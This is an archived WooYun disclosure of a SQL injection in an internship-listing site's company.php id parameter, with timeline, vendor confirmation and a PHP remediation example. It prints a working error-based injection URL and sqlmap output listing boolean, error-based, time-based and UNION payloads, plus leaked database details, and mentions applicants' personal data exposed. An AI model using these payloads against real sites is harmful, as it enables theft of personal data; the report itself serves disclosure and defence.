WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-09-30: Details reported to the vendor, awaiting the vendor's response
2015-10-10: Vendor has confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and experts in the relevant field
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public
Personal information of interns, students and assorted job applicants.
http://**.**.**.**/shixibao/e/extend/company.php?id=10504
http://**.**.**.**/shixibao/e/extend/company.php?id=10504%20and (select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)#
user: admin@**.**.**.**
database: shixibao1
version: 5.6.16-log1
Ran it through sqlmap.
300 tables, holding a large amount of intern and job-applicant information.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-2685 OR 5746=5746#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-9802 OR 1 GROUP BY CONCAT(0x716b767671,(SELECT (CASE WHEN (5242=5242) THEN 1 ELSE 0 END)),0x717a706a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (5004=5004) THEN SLEEP(5) ELSE 5004*(SELECT 5004 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: id=-8000 UNION ALL SELECT CONCAT(0x716b767671,0x55514d6d4364655a7662,0x717a706a71)#
---
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL 5.0.12
Database: shixibao
[303 tables]
Filter the parameter.
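As an added illustration of that fix (example code, not the site's own), assuming company.php loads one record by its id from a hypothetical phome_ecms_company table: the string-concatenation pattern that lets the id parameter alter the query, beside a version that validates the id as an integer and binds it as a typed parameter.

```php
<?php
// Added example, not the site's code. phome_ecms_company and the DSN and
// credentials are assumptions; only the id= parameter comes from the report.
ini_set('display_errors', '0'); // raw DBMS errors in the response are what let
                                // the GROUP BY/FLOOR(RAND(0)*2) trick leak version()

$pdo = new PDO('mysql:host=localhost;dbname=shixibao;charset=utf8mb4',
               'app_user', 'app_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

// Vulnerable pattern: $_GET['id'] is pasted into the SQL text, so
// "10504 and (select ...)#" becomes part of the statement the server runs.
function loadCompanyVulnerable(PDO $pdo, array $get): ?array
{
    $sql = "SELECT * FROM phome_ecms_company WHERE id=" . $get['id'];
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened pattern: the id must be a positive integer and is bound as one,
// so the statement text is fixed no matter what the client sends.
function loadCompanySafe(PDO $pdo, array $get): ?array
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400); // reject "10504 and (...)" before any query
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM phome_ecms_company WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

$company = loadCompanySafe($pdo, $_GET);
```

Keeping display_errors off matters independently of the query fix: the report's version:5.6.16-log1 output was read straight out of a duplicate-key error message returned to the browser.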
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-10-10 16:40
CNVD has confirmed and reproduced the described issue and has forwarded it via CNCERT to China Telecom Group, which will coordinate remediation with the unit that administers the website.
None